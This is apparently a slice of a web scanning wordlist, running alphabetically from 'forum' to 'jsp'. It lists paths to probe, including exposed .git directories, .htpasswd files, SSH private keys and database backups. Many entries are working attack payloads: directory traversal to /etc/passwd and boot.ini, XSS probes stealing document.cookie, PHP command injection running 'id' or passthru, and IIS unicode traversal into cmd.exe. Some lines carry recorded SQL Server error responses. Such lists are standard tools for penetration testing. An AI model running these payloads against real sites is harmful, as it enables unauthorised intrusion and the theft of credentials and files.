forum/admin/database/wwForum.mdb
forum/admin/wwforum.mdb
forum_arc.asp?n=268
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forumcp
forumdata
forumdisplay
forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
forum/install/install.php
forum/mainfile.php
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
forum/member.php
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forum/newreply.php
forum/newthread.php
forum_old
forum/phpmyadmin/
forum_professionnel.asp?n=100
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra.asp?n=c:\boot.ini
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd
forum-ra.asp?n=/etc/passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
forum-ra.asp?n=/etc/passwd%00
forum-ra_professionnel.asp?n=%60/etc/passwd%60
forum-ra_professionnel.asp?n=../../boot.ini
forum-ra_professionnel.asp?n=/....../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra_professionnel.asp?n=c:\boot.ini
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
forum-ra_professionnel.asp?n=/../../../etc/passwd
forum-ra_professionnel.asp?n=/etc/passwd
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
forum-ra_professionnel.asp?n=/etc/passwd%00
forum.rar
forums
forums/
forums/@ADMINconfig.php
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
forums/cache/db_update.lock
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forums/config.php
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
forum.sql
forum.tar
forum.tar.gz
forum/viewtopic.php
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forum.zip
.forward
forward
foto
foto/
fotos
fotos/
foundation
fpadmin
fpadmin/
_fpclass
fpdb
fpdb/shop.mdb
fpdf
fr
frame
frames
frameset
framework
francais
france
free
freebsd
freeware
french
fr_FR
friend
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
friends
frm_attach
frob
from
front
frontend
frontpage
fs
fsck
~ftp
ftp
ftp/
.ftp-access
.ftppass
.ftpquota
ftp.txt
fuck
fuckoff
fuckyou
full
fun
func
funcs
function
functionlude
function.require
functions
functions.inc.php+
fund
funding
funds
furl
fusion
future
fw
fwlink
fx
g
G
ga
gadget
gadgets
gaestebuch
galeria
galerie
galleries
gallery
gallery2
gallery/captionator.php
gallery/errors/configmode.php
gallery/errors/needinit.php
gallery/errors/reconfigure.php
gallery/errors/unconfigured.php
gallery/index.php?include=../../../../../../../../../etc/passwd
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
game
gamercard
games
Games
gaming
ganglia
ganglia/
garbage
gate
gateway
gaza.php
gb
gb/index.php?login=true
gbook
gccallback
gdform
geeklog
geeklog/users.php
.gem
Gemfile
Gemfile.lock
gen
general
general.chl+
generateditems
generator
generic
gentoo
geo
geoip
german
geronimo
gest
gestion
gestione
get
getaccess
getconfig
get-file
get_file
getfile
getFile.cfm
getjobid
get_od_toc.pl
getout
get.php
gettxt
gfen
gfx
gfx/
gg
gid
gif
gifs
gift
giftcert
giftoptions
giftreg_manage
giftregs
gifts
.git
.git/
git
.git2/
.gitattributes
.git/config
.gitconfig
.git/HEAD
!.gitignore
.gitignore
.gitignore~
.gitignore_global
.gitignore.swp
.git/index
.gitk
.gitkeep
.gitlab
gitlab
.gitlab-ci.yml
.gitlab/issue_templates
.gitlab/merge_request_templates
.gitlab/route-map.yml
gitlog
.git/logs/
.git/logs/HEAD
.git/logs/refs
.gitmodules
.git_release
.gitreview
.git-rewrite/
git-service
gitweb
gl
glance_config
glimpse
global
global/
Global
global.asa
global.asa.bak
global.asa.old
global.asa.orig
global.asa.temp
global.asa.tmp
global.asax
Global.asax
global.asax.bak
global.asax.old
global.asax.orig
global.asax.temp
global.asax.tmp
global.inc
globalnav
globals
globals.inc
globals.jsa
globals.php3
globals.pl
globes_admin
glossary
go
goaway
goform/CheckLogin?login=root&password=tslinux
gold
golf
gone
goods
goods_script
google
googlebot
google_sitemap
goto
government
Gozila.cgi
gp
gpapp
gpl
gprs
gps
gr
grabbed.html
gracias
gradlew
grafik
grant
granted
grants
graph
graphics
graphics/
Graphics
green
greybox
grid
group
groupcp
group_inlinemod
group.nsf
groups
groups.nsf
groupware
.grunt/
Gruntfile.js
gs
gsm
guess
~guest
guest
guest/
guestbook
guestbook/
guestbook/admin/o12guest.mdb
guestbook/admin.php
guestbook/guestbookdat
guestbook/guestbook.html
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
guestbook/pwd
guests
guests/
guest-tracking
gui
guide
guidelines
guides
gump
gv_faq
gv_redeem
gv_send
GW5/GWWEB.EXE?HELP=bad-request
gwt
GWWEB.EXE?HELP=bad-request
.gz
gz
h
H
hack
hacker
hacking
hackme
hadoop
handle
handler
handlers
handles
happen
happening
haproxy_stats
haproxy_stats1
haproxy_stats2
haproxy_stats3
hard
hardcore
hardware
harm
harming
harmony
.hash
head
header
header_logo
headers
HEADER.txt
headlines
_head.php
health
Health
healthcare
hello
helloworld
help
help/
Help
help4.nsf
help5_admin.nsf
help5_client.nsf
help5_designer.nsf
helpadmin.nsf
help_answer
help/contents.htm
helpdesk
help/domguide.nsf
help/dspug.nsf
helper
helperfunction.php
helpers
help/help4.nsf
help/helpadmin.nsf
help/helplt4.nsf
help/home.html
help.html
help/internet.nsf
help/javapg.nsf
help/lccon.nsf
helplt4.nsf
help/migrate.nsf
help/npn_admn.nsf
help/npn_rn.nsf
help.php?chapter=<script>alert('Vulnerable')</script>
help/readmec.nsf
help/readmes.nsf
help/smhelp.nsf
help/srvinst.nsf
.hg
.hg/
.hg/dirstate
.hgignore
.hgignore.global
.hgrc
.hg/requires
.hg/store/data/
.hg/store/undo
.hg/undo.dirstate
hi
hidden
hidden/
hidden.nsf
hide
high
highslide
hilfe
hipaa
hire
.history
history
HISTORY
HISTORY.rst
hit
hitcount
hitmatic/
hitmatic/analyse.cgi
hits
hits.txt
hit_tracker/
hola/admin/cms/htmltags.php?datei=./sec/data.php
hold
hole
holiday
holidays
home
home/
Home
homebet/homebet.dll?form=menu&amp;option=menu-signin
homepage
homepage/
homepage.nsf
home.php?arsc_language=elvish
home.rar
homes
home.sql
home.sql.7z
home.sql.bz2
home.sql.gz
home.sql.rar
home.sql.sql
home.sql.tar
home.sql.tar.bz2
home.sql.tar.bzip2
home.sql.tar.gz
home.sql.tar.gzip
home.sql.tgz
home.sql.zip
home.tar
home.tar.gz
homework
home.zip
honda
hooks
hop
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
horde
horde/imp/test.php
horde/test.php
horde/test.php?mode=phpinfo
host
hostadmin/?page='
hosted
hosting
hostingcontroller/
host-manager
hosts
hotel
hotels
hour
hourly
house
how
howto
hp
hp/device/this.LCDispatcher
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
hp-ux/
hpwebjetadmin
hr
ht
.hta
hta
!.htaccess
.htaccess
.htaccess~
ht.access
htaccess.backup
.htaccess.bak
htaccess.bak
.htaccess.BAK
.htaccessBAK
.htaccess.bak1
.htaccess-dev
htaccess.dist
.htaccess_extra
.htaccess-local
.htaccess-marco
.htaccess.old
htaccess.old
.htaccessOLD
.htaccessOLD2
.htaccess.orig
.htaccess_orig
.htaccess.sample
.htaccess.save
.htaccess_sc
.htaccess.txt
htaccess.txt
htbin
htdig
htdoc
htdocs
htdocs/
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
.htgroup
htgroup
htm
html
html/
HTML
htmlarea
html/cgi-bin/cgicso?query=AAA
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/config.rb
html/js/misc/swfupload/swfupload_f9.swf
html/js/misc/swfupload/swfupload.swf
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
htmls
htmltonuke.php
!.htpasswd
.htpasswd
_.htpasswd
htpasswd
htpasswd.bak
htpasswd/htpasswd.bak
.htpasswd-old
.htpasswds
.htpasswd_test
ht_root/wwwroot/-/local/httpd$map.conf
~http
http
~httpd
httpd
httpd.conf
httpd.core
httpd.ini
httpd/logs/access.log
httpd/logs/access_log
httpd/logs/error.log
httpd/logs/error_log
httpdocs
httpmodules
https
https-admserv/bin/index?/<script>alert(document.cookie)</script>
httpuser
.htusers
.ht_wsr.txt
hu
human
humans
humor
hyper
hyperstat/stat_what.log
HyperStat/stat_what.log
i
I
ia
ibill/
ibm
IBMWebAS/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/docs/
IBMWebAS/mbeanDocs/
icat
ico
icon
icons
icons/
icq
id
idbc
id_dsa
id_dsa.ppk
.idea
.idea/
idea
idea/
.idea0/
.idea/compiler.xml
.idea/copyright/profiles_settings.xml
.idea/dataSources.ids
.idea/dataSources.xml
.idea/deployment.xml
.idea/drush_stats.iml
.idea/encodings.xml
idealbb/error.asp?|-|0|404_Object_Not_Found
.idea/misc.xml
.idea_modules/
.idea/modules.xml
.idea/.name
ideas
ideas/
.idea/scopes/scope_settings.xml
.idea/Sites.iml
.idea/sqlDataSources.xml
.idea/tasks.xml
.idea/uiDesigner.xml
.idea/vcs.xml
.idea/woaWordpress.iml
.idea/workspace(2).xml
.idea/workspace(3).xml
.idea/workspace(4).xml
.idea/workspace(5).xml
.idea/workspace(6).xml
.idea/workspace(7).xml
.idea/workspace.xml
identity
idp
id_rsa
id_rsa.pub
ids
IDSWebApp/IDSjsp/Login.jsp
ie
i?/etc/passwd
if
iframe
iframes
ig
.ignore
ignore
.ignored/
ignoring
iis
iisadmin
iisadmin/
iisadmpwd
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/aexp2b.htr
iisadmpwd/aexp2.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4b.htr
iisadmpwd/aexp4.htr
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
iishelp/iis/htm/tutorial/redirect.asp
iishelp/iis/misc/default.asp
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
iissamples
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/codebrws.asp
iissamples/exair/howitworks/Winmsdp.exe
iissamples/exair/search/advsearch.asp
iissamples/exair/search/query.asp
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/exair/search/search.asp
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/codebrws.asp
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/ixqlang.htm
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/sqlqhit.asp
iissamples/issamples/SQLQHit.asp
iissamples/issamples/Winmsdp.exe
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
IlohaMail/blank.html
im
image
image/
Image
imagefolio
imagegallery
imagenes
imagenes/
imagens
_images
images
images/
Images
images01
images1
images2
images3
images/c99.php
images/?pattern=/etc/*&sort=name
images/Sym.php
imanager
_img
img
img/
img2
\"><img%20src=\"javascript:alert(document.domain)\">
imgs
imgs/
img-sys/
immagini
imp
imp/horde/test.php
imp/horde/test.php?mode=phpinfo
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
import
import/
important
import.php
imports
impreso/
impressum
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
in
inbound
inbox
_inc
inc
inc/common.load.php
inc/config.inc
inc/config.php
inc/dbase.php
inc/fckeditor/
incl
_include
include
include/customize.php
include/fckeditor/
include/help.php
include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
_includes
includes
includes/
includes/adovbs.inc
includes/configure.php~
includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
includes/fckeditor/editor/filemanager/connectors/asp/upload.asp
includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
includes/fckeditor/editor/filemanager/connectors/php/connector.php
includes/fckeditor/editor/filemanager/connectors/php/upload.php
includes/fckeditor/editor/filemanager/upload/asp/upload.asp
includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
includes/fckeditor/editor/filemanager/upload/php/upload.php
includes/footer.php3
includes/header.php3
includes/js/tiny_mce/
include/spaw2/dialogs/dialog.php
includes/swfupload/swfupload_f9.swf
includes/swfupload/swfupload.swf
includes/tiny_mce/
includes/tinymce/
incoming
incoming/
incs
inc/sendmail.inc
inc/tiny_mce/
inc/tinymce/
incubator
index
Index
index_01
index_1
index1
index_2
index2
index2.php
index3
index3.php
index_adm
index_admin
index-bak
indexes
index_files
index.htm
index.html
index.html~
index.html%20
index.html.bak
index.html.ca
index.html.cz.iso8859-2
index.html.de
index.html.dk
index.html.ee
index.html.el
index.html.en
index.html.es
index.html.et
index.html.fr
index.html.he.iso8859-8
index.html.hr.iso8859-2
index.html.it
index.html.ja.iso2022-jp
index.html.kr.iso2022-kr
index.html.ltz.utf8
index.html.lu.utf8
index.html.nl
index.html.nn
index.html.no
index.html.po.iso8859-2
index.html.pt
index.html.pt-br
index.html.ru.cp-1251
index.html.ru.cp866
index.html.ru.iso-ru
index.html.ru.koi8-r
index.html.ru.utf8
index.html.se
index.html.tw
index.html.tw.Big5
index.html.var
index.jsp%00x
__index.php
_index.php
index.php
index.php~
index.php/123
index.php3
index.php4
index.php5
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php-bak
index.php.bak
index.php?base=test%20
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php?dir=<script>alert('Vulnerable')</script>
index.php?download=/etc/passwd
index.php?download=/windows/win.ini
index.php?download=/winnt/win.ini
index.php?err=3&email=\"><script>alert(document.cookie)</script>
index.php?|=../../../../../../../../../etc/passwd
index.php?file=index.php
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?IDAdmin=test
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
index.php?module=My_eGallery
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?offset=[%20Problem%20Here%20]
index.php?option=search&searchword=<script>alert(document.cookie);</script>
index.php?page=../../../../../../../../../../boot.ini
index.php?page=../../../../../../../../../../etc/passwd
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
index.php?pymembs=admin
index.php?rep=<script>alert(document.cookie)</script>
index.phps
index.php/\"><script><script>alert(document.cookie)</script><
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?sql_debug=1
index.php?SqlQuery=test%20
index.php?tampon=test%20
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
index.php?vo=\"><script>alert(document.cookie);</script>
index.sql
index-test.php
index_var_de
index.xml
industries
industry
indy_admin
Indy_admin
inetpub
inetsrv
inf
info
info/
info.json
info.php
informacion/
information
information/
informer
infos
infos/contact/index.asp
infos/faq/index.asp
infos/gen/index.asp
infos.php
infos/services/index.asp
info.txt
infraction
ingres
ingresa/
ingreso/
ingress
.ini
ini
init
injection
inline
inlinemod
iNotes/Forms5.nsf
iNotes/Forms5.nsf/$DefaultNav
input
inquire
inquiries
inquiry
insert
.inst/
instaboard/index.cfm
_install
~install/
install
install/
install_
install~/
INSTALL
install1/
install2/
INSTALL_admin
installation
installation.php
.install/composer.phar
.installed.cfg
installed.json
installer
installer/
INSTALL.html
install/install.php
INSTALL.md
install.mysql
INSTALL.mysql
install.mysql.txt
INSTALL.mysql.txt
install.pgsql
INSTALL.pgsql
install.pgsql.txt
INSTALL.pgsql.txt
install.php
install.sql
install.txt
Install.txt
INSTALL.txt
install/update.log
installwordpress
install-xaff
install-xaom
install-xbench
install-xfcomp
install-xoffers
install-xpconf
install-xrma
install-xsurvey
instance
instantwebmail/message.php
instructions
insurance
int
intel
intelligence
inter
interactive
interchange/
interface
interim
intermediate
intern
internal
internal/
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
internal.sws?../../../../../../../../winnt/win.ini
international
internet
Internet
internet.nsf
interscan/
interscan/cgi-bin/FtpSave.dll?I'm%20Here
interview
interviews
intl
intra
intracorp
intranet
intranet/
intranet/browse.php
intro
introduction
inventory
investors
invitado/
invitados/
invitation
invite
invitefriends.php3
invoice
invoices
invoker/JMXInvokerServlet
ioncube
ip
ipc
ipchat.php
ipdata
iphone
i.php
ipn
ipod
ipp
ips
ips_kernel
ip.txt
ir
iraq
irc
irc-macadmin
is
isapi
isapi/count.pl?
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
is-bin
iso
isp
ispmgr/
isqlplus
ISSamples/sqlqhit.asp
ISSamples/SQLQHit.asp
issue
issues
isx.html
it
ita
i.tar
i.tar.bz2
i.tar.gz
item
items
it_IT
i.txt
iw
ixmail_netattach.php
i.zip
j
J
j2ee
j2ee/
j2me
ja
jacob
ja_JP
jakarta
jamdb/
japan
jar
java
java/
Java
javac
javadoc
javadoc/
javapg.nsf
java-plugin
java-plugin/
javascript
javascripts
java-sys
java-sys/
javax
javax.faces.resource.../WEB-INF/web.xml.jsf
jboss
jbossas
jbossws
jdbc
jdbc/
jdk
jennifer
jessica
jexr
jgb_eng_php3/cfooter.php3
jhtml
jigsaw
jigsaw/
jira
jira/
jj
jmx-console
jmx-console/
JMXSoapAdapter
job
job/
jobs
joe
.joe_state
john
join
joinrequests
joomla
joomla.rar
joomla.xml
joomla.zip
jo.php
jotter.nsf
journal
journals
jp
jpa
jpegimage
jpg
jquery
jre
.jrubyrc
jrun
jrun/
_js
js
jscript
jscripts
jscripts/tiny_mce/
jscripts/tinymce/
jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
.jscsrc
js/elfinder/elfinder.php
jservdocs/
jsession
jsf
js/FCKeditor
jsFiles
.jsfmtrc
.jshintignore
.jshintrc
js-lib
json
json-api
jsp
jsp2
jspdocs/
jsp-examples
jsp-examples/
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
